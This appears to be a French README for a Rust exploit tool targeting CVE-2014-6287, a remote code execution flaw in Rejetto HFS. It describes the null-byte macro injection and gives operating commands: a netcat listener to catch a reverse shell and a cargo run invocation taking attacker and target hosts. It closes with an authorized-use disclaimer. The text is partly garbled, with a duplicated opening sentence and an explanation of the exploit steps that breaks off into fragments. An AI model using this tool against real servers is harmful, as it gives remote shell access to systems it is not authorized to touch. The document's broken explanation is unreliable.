
Une implémentation en Rust de l'exploit CVE-2014-6287 ciblant Rejetto HTTP File Server (HFS) versions 2.3x antérieures à 2.3c.
Une implémentation en Rust de l'exploit CVE-2014-6287 ciblant le serveur de fichiers HTTP Rejetto (HFS) versions 2.3x antérieures à 2.3c.
CVE-2014-6287 est une vulnérabilité critique d'exécution de code à distance dans le serveur de fichiers HTTP Rejetto (HFS).
La fonction findMacroMarker dans parserLib.pas du serveur de fichiers HTTP Rejetto permet à des attaquants distants d'exécuter des programmes arbitraires via une séquence %00 dans une action de recherche. Cette vulnérabilité permet aux attaquants de contourner la validation des entrées et d'injecter du code malveillant qui est exécuté sur le système cible.
L'exploit fonctionne de la manière suivante :
%00){. et .}Avant d'exécuter l'exploit, configurez un écouteur sur votre machine d'attaque pour recevoir le shell inverse :
# Remplacez <LPORT> par le port d'écoute souhaité
nc -lvnp <LPORT>
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]
-l, --lhost <LHOST> : Votre adresse IP locale (machine de l'attaquant)-p, --lport <LPORT> : Votre port local pour le shell inverse-r, --rhost <RHOST> : Adresse IP cible (serveur HFS vulnérable)-t, --rport <RPORT> : Port cible (par défaut : 80)Cet outil est destiné uniquement à des fins éducatives et de tests d'intrusion autorisés. Utilisez-le de manière responsable et uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite.